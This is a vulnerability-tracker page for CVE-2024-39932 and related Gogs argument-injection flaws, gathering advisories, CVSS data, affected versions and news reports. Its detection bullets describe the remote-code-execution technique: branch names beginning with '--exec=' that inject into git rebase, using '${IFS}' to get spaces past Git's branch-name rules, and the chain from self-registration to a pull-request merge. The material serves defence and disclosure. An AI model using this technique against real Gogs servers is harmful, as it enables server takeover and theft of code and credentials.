CVE-2024-39932
published 2024-07-04CVE-2024-39932: Gogs through 0.13.0 allows argument injection during the previewing of changes.
PriorityP271critical9.9CVSS 3.1
AVNACLPRLUINSCCHIHAH
EPSS
17.18%
96.7th percentile
Gogs through 0.13.0 allows argument injection during the previewing of changes.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| github.com | gogs_gogs | 0 – 0.13.0 | — |
| gogs.io | gogs | >= 0 < 0.13.1 | 0.13.1 |
| gogs.io | gogs | >= 0 < 0.14.3 | 0.14.3 |
| gogs | gogs | <= 0.13.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect HTTP 500 responses from Gogs server coinciding with pull request merge operations — the RCE fires at git rebase step (Step 3) before the merge aborts with a 500 error, making the 500 a post-exploitation artifact. ↗
- →Alert on git branch names or PR base branch parameters beginning with '--exec=' in Gogs HTTP request logs or database entries, as this is the injection prefix used to trigger RCE via git rebase. ↗
- →Monitor git rebase process invocations on the Gogs server for command-line arguments containing '--exec=' flags, especially those spawning sh -c child processes, as this is the RCE execution primitive. ↗
- →Detect use of ${IFS} in Git branch names or PR parameters in Gogs — this is used to inject spaces into shell commands while bypassing Git's prohibition on spaces in branch names. ↗
- →Monitor for new user account creation followed immediately by repository creation and enabling of 'Rebase before merging' (PullsAllowRebase) on Gogs instances with open registration — this is the self-contained unauthenticated-to-RCE exploit chain. ↗
- →The exploit is fully automatable via a Metasploit module; correlate rapid sequential HTTP requests for account creation, repo creation, branch push, and PR merge on Gogs endpoints as a behavioral indicator. ↗
- ·Gogs ships with open registration enabled by default, meaning any unauthenticated user can create an account and exploit this vulnerability without admin interaction. Disabling registration (DISABLE_REGISTRATION = true in app.ini) is the most impactful mitigation. ↗
- ·On Docker installations, the Gogs process runs as the git user (UID 1000 by default), giving the attacker filesystem-level read/write access to every repository under a single REPOSITORY_ROOT directory with no OS-level isolation between repositories. ↗
CVSS provenance
nvdv3.19.9CRITICALCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
ghsa9.9CRITICAL
osv9.9CRITICAL
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Gogs vulnerable to RCE via git rebase --exec argument injection in pull request merge
ghsa·2026-06-23
CVE-2026-52806 [CRITICAL] CWE-77 Gogs vulnerable to RCE via git rebase --exec argument injection in pull request merge
Gogs vulnerable to RCE via git rebase --exec argument injection in pull request merge
# Gogs: RCE via `git rebase --exec` Argument Injection in PR Merge
## Summary
Gogs allows authenticated users to achieve Remote Code Execution (RCE) on the server by creating a pull request with a specially crafted branch name that injects the `--exec` flag into the `git rebase` command during the "Rebase before merging" merge operation.
## Severity
**Critical** - CVSS 3.1 Base Score: 9.9 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
## Affected Versions
- **Gogs 0.14.2** (latest supported release)
- Gogs 0.15.0+dev (commit `b53d3162`, main branch as of 2026-03-16)
- All prior versions that support the "Rebase before merging" merge style
## Impact
This is a **privilege escalation from authenticated user
OSV
Gogs allows argument injection during the previewing of changes
osv·2024-12-23·CVSS 9.9
CVE-2024-39932 [CRITICAL] Gogs allows argument injection during the previewing of changes
Gogs allows argument injection during the previewing of changes
### Impact
Unprivileged user accounts can write to arbitrary files on the filesystem. We could demonstrate its exploitation to force a re-installation of the instance, granting administrator rights. It allows accessing and altering any user's code hosted on the same instance.
### Patches
Unintended Git options has been ignored for diff preview (https://github.com/gogs/gogs/pull/7871). Users should upgrade to 0.13.1 or the latest 0.14.0+dev.
### Workarounds
No viable workaround available, please only grant access to trusted users to your Gogs instance on affected versions.
### References
https://www.cve.org/CVERecord?id=CVE-2024-39932
GHSA
Gogs allows argument injection during the previewing of changes
ghsa·2024-12-23·CVSS 9.9
CVE-2024-39932 [CRITICAL] CWE-94 Gogs allows argument injection during the previewing of changes
Gogs allows argument injection during the previewing of changes
### Impact
Unprivileged user accounts can write to arbitrary files on the filesystem. We could demonstrate its exploitation to force a re-installation of the instance, granting administrator rights. It allows accessing and altering any user's code hosted on the same instance.
### Patches
Unintended Git options has been ignored for diff preview (https://github.com/gogs/gogs/pull/7871). Users should upgrade to 0.13.1 or the latest 0.14.0+dev.
### Workarounds
No viable workaround available, please only grant access to trusted users to your Gogs instance on affected versions.
### References
https://www.cve.org/CVERecord?id=CVE-2024-39932
OSV
Gogs allows argument injection during the previewing of changes in github.com/gogs/gogs
osv·2024-07-09
CVE-2024-39932 Gogs allows argument injection during the previewing of changes in github.com/gogs/gogs
Gogs allows argument injection during the previewing of changes in github.com/gogs/gogs
Gogs allows argument injection during the previewing of changes in github.com/gogs/gogs
OSV
Duplicate Advisory: Gogs allows argument injection during the previewing of changes
osv·2024-07-04
CVE-2024-39932 [CRITICAL] Duplicate Advisory: Gogs allows argument injection during the previewing of changes
Duplicate Advisory: Gogs allows argument injection during the previewing of changes
# Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-9pp6-wq8c-3w2c. This link is maintained to preserve external references.
# Original Description
Gogs through 0.13.0 allows argument injection during the previewing of changes.
No detection rules found.
No public exploits indexed.
Bleepingcomputer
Gogs patches critical zero-day enabling remote code execution
blogs_bleepingcomputer·2026-06-08
CVE-2024-39933 Gogs patches critical zero-day enabling remote code execution
## Gogs patches critical zero-day enabling remote code execution
## Sergiu Gatlan
Gogs has patched a critical security zero-day flaw that can allow attackers to compromise Internet-facing instances and access any repositories (including private ones).
This argument injection vulnerability has yet to be assigned a CVE ID, can only be exploited by authenticated attackers without admin privileges, and affects all Gogs releases up to and including 0.14.2 and 0.15.0+dev.
They can exploit this vulnerability to compromise the targeted server, read any repository (including private repos), steal credentials, move laterally to other systems on the network, and alter any hosted source code.
While threat actors would need at least basic user privileges to exploit the flaw, Rapid7 security resear
Rapid7
Authenticated RCE via Argument Injection in Gogs (NOT FIXED)
blogs_rapid7·2026-05-28
CVE-2024-39933 Authenticated RCE via Argument Injection in Gogs (NOT FIXED)
## Overview
Rapid7 Labs discovered a critical argument injection ( CWE-88 ) vulnerability in Gogs , a popular open-source self-hosted Git service. Rapid7 Labs scores this vulnerability as CVSSv4 9.4 (Critical). The vulnerability allows any authenticated user to achieve remote code execution (RCE) on the server by creating a pull request with a malicious branch name that injects the --exec flag into git rebase during the "Rebase before merging" merge operation. At the time of publication, the vendor has not released a patch.
The exploit requires no admin privileges and no interaction with other users; an attacker operates entirely within their own account. Since Gogs ships with open registration enabled by default ( DISABLE_REGISTRATION = false ) and no limit on repository creation ( MAX_
Bleepingcomputer
New Gogs zero-day flaw lets hackers get remote code execution
blogs_bleepingcomputer·2026-05-28·CVSS 7.7
CVE-2024-39933 [HIGH] New Gogs zero-day flaw lets hackers get remote code execution
## New Gogs zero-day flaw lets hackers get remote code execution
## Sergiu Gatlan
An unpatched zero-day vulnerability in the Gogs self-hosted Git service can allow attackers to gain remote code execution (RCE) on Internet-facing instances.
Designed as an alternative to GitHub Enterprise or GitLab and written in Go, Gogs is often exposed online for remote collaboration.
This critical severity argument injection security flaw has yet to be assigned a CVE ID, affects the latest release versions (Gogs 0.14.2 and 0.15.0+dev), and can only be exploited by authenticated attackers without admin privileges.
However, even though it requires basic user privileges to exploit, Rapid7 senior security researcher Jonah Burgess (who discovered the flaw) said the vulnerability affects all Gogs servers
2024-07-04
Published